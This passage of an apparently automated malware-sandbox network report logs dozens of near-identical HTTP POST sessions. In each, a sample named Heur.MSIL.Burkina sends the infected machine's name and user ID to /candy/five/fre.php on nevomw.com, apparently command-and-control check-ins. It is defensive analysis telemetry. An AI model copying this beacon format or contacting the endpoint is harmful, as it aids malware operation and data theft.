                                            Dec 2, 2020 11:52:45.722135067 CET | 82 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:45.795233965 CET | 82 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            80 | 192.168.2.6 | 49812 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:20.223712921 CET | 1228 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:20.275996923 CET | 1229 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:20.352596998 CET | 1229 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            81 | 192.168.2.6 | 49814 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:20.813499928 CET | 1237 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:20.866096020 CET | 1237 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:20.939320087 CET | 1242 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            82 | 192.168.2.6 | 49815 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:21.264204979 CET | 1244 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:21.316510916 CET | 1245 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:21.393949986 CET | 1245 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            83 | 192.168.2.6 | 49817 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:22.027796030 CET | 1253 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:22.080390930 CET | 1254 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:22.162085056 CET | 1258 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            84 | 192.168.2.6 | 49818 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:23.193449974 CET | 1260 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:23.245426893 CET | 1260 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:23.321213007 CET | 1261 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            85 | 192.168.2.6 | 49820 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:23.601424932 CET | 1267 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:23.656766891 CET | 1267 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:23.731801987 CET | 1270 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            86 | 192.168.2.6 | 49821 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:23.968585968 CET | 1275 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:24.022847891 CET | 1275 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:24.096740961 CET | 1275 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            87 | 192.168.2.6 | 49822 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:24.405828953 CET | 1276 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:24.457792044 CET | 1277 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:24.532399893 CET | 1278 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            88 | 192.168.2.6 | 49824 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:24.836771011 CET | 1280 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:24.889547110 CET | 1280 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:24.964977026 CET | 1284 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            89 | 192.168.2.6 | 49825 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:25.252017975 CET | 1287 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:25.304867983 CET | 1287 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:25.382786036 CET | 1290 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            9 | 192.168.2.6 | 49722 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:46.501884937 CET | 83 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:46.553891897 CET | 83 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:46.626796007 CET | 84 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            90 | 192.168.2.6 | 49826 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:25.628463984 CET | 1296 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:25.681499004 CET | 1296 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:25.760842085 CET | 1298 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            91 | 192.168.2.6 | 49828 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:26.033210039 CET | 1301 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:26.086241007 CET | 1306 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:26.161587954 CET | 1307 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            92 | 192.168.2.6 | 49829 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:26.444756031 CET | 1318 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:26.496526957 CET | 1318 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:26.583801031 CET | 1320 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            93 | 192.168.2.6 | 49830 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:26.882936001 CET | 1326 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:26.936121941 CET | 1327 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:27.009886026 CET | 1328 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            94 | 192.168.2.6 | 49832 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:27.289891005 CET | 1339 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:27.345532894 CET | 1344 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:27.425017118 CET | 1345 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            95 | 192.168.2.6 | 49833 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:27.719155073 CET | 1352 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:27.772336960 CET | 1352 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:27.845240116 CET | 1353 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            96 | 192.168.2.6 | 49835 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:28.159276962 CET | 1365 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
